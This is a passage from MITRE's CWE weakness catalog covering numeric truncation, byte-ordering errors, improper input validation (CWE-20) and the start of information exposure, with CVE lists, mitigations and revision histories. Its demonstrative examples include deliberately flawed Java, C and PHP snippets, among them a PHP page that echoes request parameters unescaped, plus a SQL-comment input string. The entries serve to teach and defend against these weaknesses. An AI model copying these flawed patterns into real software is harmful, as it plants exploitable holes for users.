https://www.cve.org/CVERecord?id=CVE-2020-17087 + + + CVE-2009-0231 + Integer truncation of length value leads to heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2009-0231 + + + CVE-2008-3282 + Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated. + https://www.cve.org/CVERecord?id=CVE-2008-3282 + + + + + Numeric truncation error + + + Truncation error + + + FIO34-C + Distinguish between characters read from a file and EOF or WEOF + CWE More Abstract + + + FLP34-C + Ensure that floating point conversions are within range of the new type + CWE More Abstract + + + INT02-C + Understand integer conversion rules + + + INT05-C + Do not use input functions to convert character data if they cannot handle all possible inputs + + + INT31-C + Ensure that integer conversions do not result in lost or misinterpreted data + CWE More Abstract + + + NUM12-J + Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data + + + SFP1 + Glitch in computation + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness has traditionally been under-studied and under-reported, although vulnerabilities in popular software have been published in 2008 and 2009. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Observed_Examples, Other_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used. + + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Black Box + Because byte ordering bugs are usually very noticeable even with normal inputs, this bug is more likely to occur in rarely triggered error conditions, making them difficult to detect using black box methods. + + + + + Numeric Byte Ordering Error + + + FIO12-J + Provide methods to read and write little-endian data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Under-reported. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Detection_Factors, Relationships, Research_Gaps, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Numeric Byte Ordering Error + + + + The product receives input or data, but it does + not validate or incorrectly validates that the input has the + properties that are required to process the data safely and + correctly. + + Input validation is a frequently-used technique + for checking potentially dangerous inputs in order to + ensure that the inputs are safe for processing within the + code, or when communicating with other components. When + software does not validate input properly, an attacker is + able to craft the input in a form that is not expected by + the rest of the application. This will lead to parts of the + system receiving unintended input, which may result in + altered control flow, arbitrary control of a resource, or + arbitrary code execution. + Input validation is not the only technique for + processing input, however. Other techniques attempt to + transform potentially-dangerous input into something safe, such + as filtering (CWE-790) - which attempts to remove dangerous + inputs - or encoding/escaping (CWE-116), which attempts to + ensure that the input is not misinterpreted when it is included + in output to another component. Other techniques exist as well + (see CWE-138 for more examples.) + Input validation can be applied to: + + raw data - strings, numbers, parameters, file contents, etc. + metadata - information about the raw data, such as headers or size + + Data can be simple or structured. Structured data + can be composed of many nested layers, composed of + combinations of metadata and raw data, with other simple or + structured data. + Many properties of raw data or metadata may need + to be validated upon entry into the code, such + as: + + specified quantities such as size, length, frequency, price, rate, number of operations, time, etc. + implied or derived quantities, such as the actual size of a file instead of a specified size + indexes, offsets, or positions into more complex data structures + symbolic keys or other elements into hash tables, associative arrays, etc. + well-formedness, i.e. syntactic correctness - compliance with expected syntax + lexical token correctness - compliance with rules for what is treated as a token + specified or derived type - the actual type of the input (or what the input appears to be) + consistency - between individual data elements, between raw data and metadata, between references, etc. + conformance to domain-specific rules, e.g. business logic + equivalence - ensuring that equivalent inputs are treated the same + authenticity, ownership, or other attestations about the input, e.g. a cryptographic signature to prove the source of the data + + Implied or derived properties of data must often + be calculated or inferred by the code itself. Errors in + deriving properties may be considered a contributing factor + to improper input validation. + + Note that "input validation" has very different + meanings to different people, or within different + classification schemes. Caution must be used when + referencing this CWE entry or mapping to it. For example, + some weaknesses might involve inadvertently giving control + to an attacker over an input when they should not be able + to provide an input at all, but sometimes this is referred + to as input validation. + Finally, it is important to emphasize that the + distinctions between input validation and output escaping + are often blurred, and developers must be careful to + understand the difference, including how input validation + is not always sufficient to prevent vulnerabilities, + especially when less stringent data types must be + supported, such as free-form text. Consider a SQL injection + scenario in which a person's last name is inserted into a + query. The name "O'Reilly" would likely pass the validation + step since it is a common last name in the English + language. However, this valid name cannot be directly + inserted into the database because it contains the "'" + apostrophe character, which would need to be escaped or + otherwise transformed. In this case, removing the + apostrophe might reduce the risk of SQL injection, but it + would produce incorrect behavior because the wrong name + would be recorded. + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields can not be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602). + + + + High + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU. + + + Confidentiality + Read Memory + Read Files or Directories + An attacker could read confidential data if they are able to control resource references. + + + Integrity + Confidentiality + Availability + Modify Memory + Execute Unauthorized Code or Commands + An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution. + + + + + Automated Static Analysis + + Some instances of improper input validation can be detected using automated static analysis. + A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present. + Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. + + + + Manual Static Analysis + When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented. + + + Fuzzing + Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Fuzz Tester + Framework-based Fuzzer + + Cost effective for partial coverage: + + Host Application Interface Scanner + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + Attack Surface Reduction + Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111] + + + Architecture and Design + Libraries or Frameworks + Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173). + + + Architecture and Design + Implementation + Attack Surface Reduction + Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + High + + + Architecture and Design + + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings. + + + + Implementation + When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined. + + + Implementation + Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow. + + + Implementation + Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained. + + + Implementation + + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control. + Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content. + + + + Implementation + When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so. + + + + + This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated. + + ...public static final double price = 20.00;int quantity = currentUser.getAttribute("quantity");double total = price * quantity;chargeUser(total);... + + The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited. + + + This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares. + + ...#define MAX_DIM 100... + /* board dimensions */ + + int m,n, error;board_square_t *board;printf("Please specify the board height: \n");error = scanf("%d", &m);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}printf("Please specify the board width: \n");error = scanf("%d", &n);if ( EOF == error ){die("No integer passed: Die evil hacker!\n");}if ( m > MAX_DIM || n > MAX_DIM ) {die("Value too large: Die evil hacker!\n");}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));... + + While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program. + + + The following example shows a PHP application in which the programmer attempts to display a user's birthday and homepage. + + $birthday = $_GET['birthday'];$homepage = $_GET['homepage'];echo "Birthday: $birthday<br>Homepage: <a href=$homepage>click here</a>" + + The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with <script> tags providing the values for birthday and / or homepage, then the script will run on the client's browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form: + + 2009-01-09-- + + If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism. + Furthermore, an XSS (CWE-79) attack or SQL injection (CWE-89) are just a few of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible. + + + The following example takes a user-supplied value to allocate an array of objects and then operates on the array. + + private void buildList ( int untrustedListSize ){if ( 0 > untrustedListSize ){die("Negative value supplied for list size, die evil hacker!");}Widget[] list = new Widget [ untrustedListSize ];list[0] = new Widget();} + + This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown. + + + This Android application has registered to handle a URL when sent an intent: + + + + ... + IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); + ... + + public class UrlHandlerReceiver extends BroadcastReceiver { + @Overridepublic void onReceive(Context context, Intent intent) { + if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); + + ... + } + } + } + + The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. + + + + + CVE-2021-30860 + Chain: improper input validation (CWE-20) leads to integer overflow (CWE-190) in mobile OS, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-30860 + + + CVE-2021-30663 + Chain: improper input validation (CWE-20) leads to integer overflow (CWE-190) in mobile OS, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-30663 + + + CVE-2021-22205 + Chain: backslash followed by a newline can bypass a validation step (CWE-20), leading to eval injection (CWE-95), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-22205 + + + CVE-2021-21220 + Chain: insufficient input validation (CWE-20) in browser allows heap corruption (CWE-787), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-21220 + + + CVE-2020-9054 + Chain: improper input validation (CWE-20) in username parameter, leading to OS command injection (CWE-78), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + CVE-2020-3452 + Chain: security product has improper input validation (CWE-20) leading to directory traversal (CWE-22), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-3452 + + + CVE-2020-3161 + Improper input validation of HTTP requests in IP phone, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-3161 + + + CVE-2020-3580 + Chain: improper input validation (CWE-20) in firewall product leads to XSS (CWE-79), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-3580 + + + CVE-2021-37147 + Chain: caching proxy server has improper input validation (CWE-20) of headers, allowing HTTP response smuggling (CWE-444) using an "LF line ending" + https://www.cve.org/CVERecord?id=CVE-2021-37147 + + + CVE-2008-5305 + Eval injection in Perl program using an ID that should only contain hyphens and numbers. + https://www.cve.org/CVERecord?id=CVE-2008-5305 + + + CVE-2008-2223 + SQL injection through an ID that was supposed to be numeric. + https://www.cve.org/CVERecord?id=CVE-2008-2223 + + + CVE-2008-3477 + lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption. + https://www.cve.org/CVERecord?id=CVE-2008-3477 + + + CVE-2008-3843 + insufficient validation enables XSS + https://www.cve.org/CVERecord?id=CVE-2008-3843 + + + CVE-2008-3174 + driver in security product allows code execution due to insufficient validation + https://www.cve.org/CVERecord?id=CVE-2008-3174 + + + CVE-2007-3409 + infinite loop from DNS packet with a label that points to itself + https://www.cve.org/CVERecord?id=CVE-2007-3409 + + + CVE-2006-6870 + infinite loop from DNS packet with a label that points to itself + https://www.cve.org/CVERecord?id=CVE-2006-6870 + + + CVE-2008-1303 + missing parameter leads to crash + https://www.cve.org/CVERecord?id=CVE-2008-1303 + + + CVE-2007-5893 + HTTP request with missing protocol version number leads to crash + https://www.cve.org/CVERecord?id=CVE-2007-5893 + + + CVE-2006-6658 + request with missing parameters leads to information exposure + https://www.cve.org/CVERecord?id=CVE-2006-6658 + + + CVE-2008-4114 + system crash with offset value that is inconsistent with packet size + https://www.cve.org/CVERecord?id=CVE-2008-4114 + + + CVE-2006-3790 + size field that is inconsistent with packet size leads to buffer over-read + https://www.cve.org/CVERecord?id=CVE-2006-3790 + + + CVE-2008-2309 + product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning + https://www.cve.org/CVERecord?id=CVE-2008-2309 + + + CVE-2008-3494 + security bypass via an extra header + https://www.cve.org/CVERecord?id=CVE-2008-3494 + + + CVE-2008-3571 + empty packet triggers reboot + https://www.cve.org/CVERecord?id=CVE-2008-3571 + + + CVE-2006-5525 + incomplete denylist allows SQL injection + https://www.cve.org/CVERecord?id=CVE-2006-5525 + + + CVE-2008-1284 + NUL byte in theme name causes directory traversal impact to be worse + https://www.cve.org/CVERecord?id=CVE-2008-1284 + + + CVE-2008-0600 + kernel does not validate an incoming pointer before dereferencing it + https://www.cve.org/CVERecord?id=CVE-2008-0600 + + + CVE-2008-1738 + anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution + https://www.cve.org/CVERecord?id=CVE-2008-1738 + + + CVE-2008-1737 + anti-virus product allows DoS via zero-length field + https://www.cve.org/CVERecord?id=CVE-2008-1737 + + + CVE-2008-3464 + driver does not validate input from userland to the kernel + https://www.cve.org/CVERecord?id=CVE-2008-3464 + + + CVE-2008-2252 + kernel does not validate parameters sent in from userland, allowing code execution + https://www.cve.org/CVERecord?id=CVE-2008-2252 + + + CVE-2008-2374 + lack of validation of string length fields allows memory consumption or buffer over-read + https://www.cve.org/CVERecord?id=CVE-2008-2374 + + + CVE-2008-1440 + lack of validation of length field leads to infinite loop + https://www.cve.org/CVERecord?id=CVE-2008-1440 + + + CVE-2008-1625 + lack of validation of input to an IOCTL allows code execution + https://www.cve.org/CVERecord?id=CVE-2008-1625 + + + CVE-2008-3177 + zero-length attachment causes crash + https://www.cve.org/CVERecord?id=CVE-2008-3177 + + + CVE-2007-2442 + zero-length input causes free of uninitialized pointer + https://www.cve.org/CVERecord?id=CVE-2007-2442 + + + CVE-2008-5563 + crash via a malformed frame structure + https://www.cve.org/CVERecord?id=CVE-2008-5563 + + + CVE-2008-5285 + infinite loop from a long SMTP request + https://www.cve.org/CVERecord?id=CVE-2008-5285 + + + CVE-2008-3812 + router crashes with a malformed packet + https://www.cve.org/CVERecord?id=CVE-2008-3812 + + + CVE-2008-3680 + packet with invalid version number leads to NULL pointer dereference + https://www.cve.org/CVERecord?id=CVE-2008-3680 + + + CVE-2008-3660 + crash via multiple "." characters in file extension + https://www.cve.org/CVERecord?id=CVE-2008-3660 + + + + + Input validation and representation + + + A1 + Unvalidated Input + CWE More Specific + + + ERR07-C + Prefer functions that support error checking over equivalent functions that don't + + + FIO30-C + Exclude user input from format strings + CWE More Abstract + + + MEM10-C + Define and use a pointer validation function + + + 20 + Improper Input Handling + + + SFP25 + Tainted input to variable + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-20 is commonly misused in low-information vulnerability reports when lower-level CWEs could be used instead, or when more details about the vulnerability are available [REF-1287]. It is not useful for trend analysis. It is also a level-1 Class (i.e., a child of a Pillar). + Consider lower-level children such as Improper Use of Validation Framework (CWE-1173) or improper validation involving specific types or properties of input such as Specified Quantity (CWE-1284); Specified Index, Position, or Offset (CWE-1285); Syntactic Correctness (CWE-1286); Specified Type (CWE-1287); Consistency within Input (CWE-1288); or Unsafe Equivalence (CWE-1289). + + + + + + + + + + + + + + + + CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks. + + As of 2020, this entry is used more often than preferred, and it is a source of frequent confusion. It is being actively modified for CWE 4.1 and subsequent versions. + Concepts such as validation, data transformation, and neutralization are being refined, so relationships between CWE-20 and other entries such as CWE-707 may change in future versions, along with an update to the Vulnerability Theory document. + Input validation - whether missing or incorrect - is such an essential and widespread part of secure development that it is implicit in many different weaknesses. Traditionally, problems such as buffer overflows and XSS have been classified as input validation problems by many security professionals. However, input validation is not necessarily the only protection mechanism available for avoiding such problems, and in some cases it is not even sufficient. The CWE team has begun capturing these subtleties in chains within the Research Concepts view (CWE-1000), but more work is needed. + + The "input validation" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships. + Some people use "input validation" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean "checking if an input conforms to expectations without changing it." CWE uses this more narrow interpretation. + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Demonstrative_Examples, Maintenance_Notes, Modes_of_Introduction, Observed_Examples, Relationships, Research_Gaps, Terminology_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations, Research_Gaps, Terminology_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Applicable_Platforms, Common_Consequences, Relationship_Notes + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Insufficient Input Validation + + + + The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. + + There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: + + private, personal information, such as personal messages, financial data, health records, geographic location, or contact details + system status and environment, such as the operating system and installed packages + business secrets and intellectual property + network status and configuration + the product's own code or internal state + metadata, e.g. logging of connections or message headers + indirect information, such as a discrepancy between two internal operations that can be observed by an outsider + + Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected. These parties include: + + the product's own users + people or organizations whose information is created or used by the product, even if they are not direct product users + the product's administrators, including the admins of the system(s) and/or networks on which the product operates + the developer + + Information exposures can occur in different ways: + + the code explicitly inserts sensitive information into resources or messages that are intentionally made accessible to unauthorized actors, but should not contain the information - i.e., the information should have been "scrubbed" or "sanitized" + a different weakness or mistake indirectly inserts the sensitive information into resources, such as a web script error revealing the full system path of the program. + the code manages resources that intentionally contain sensitive information, but the resources are unintentionally made accessible to unauthorized actors. In this case, the information exposure is resultant - i.e., a different weakness enabled the access to the information in the first place. + + It is common practice to describe any loss of confidentiality as an "information exposure," but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read. CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store, transfer, or cleanse sensitive information. + + + + + + + Primary + Developers may insert sensitive information that they do not believe, or they might forget to remove the sensitive information after it has been processed + + + Resultant + Separate mistakes or weaknesses could inadvertently make the sensitive information available to an attacker, such as in a detailed error message that can be read by an unauthorized party + + + + + + + + + Information Disclosure + This term is frequently used in vulnerability advisories to describe a consequence or technical impact, for any vulnerability that has a loss of confidentiality. Often, CWE-200 can be misused to represent the loss of confidentiality, even when the mistake - i.e., the weakness 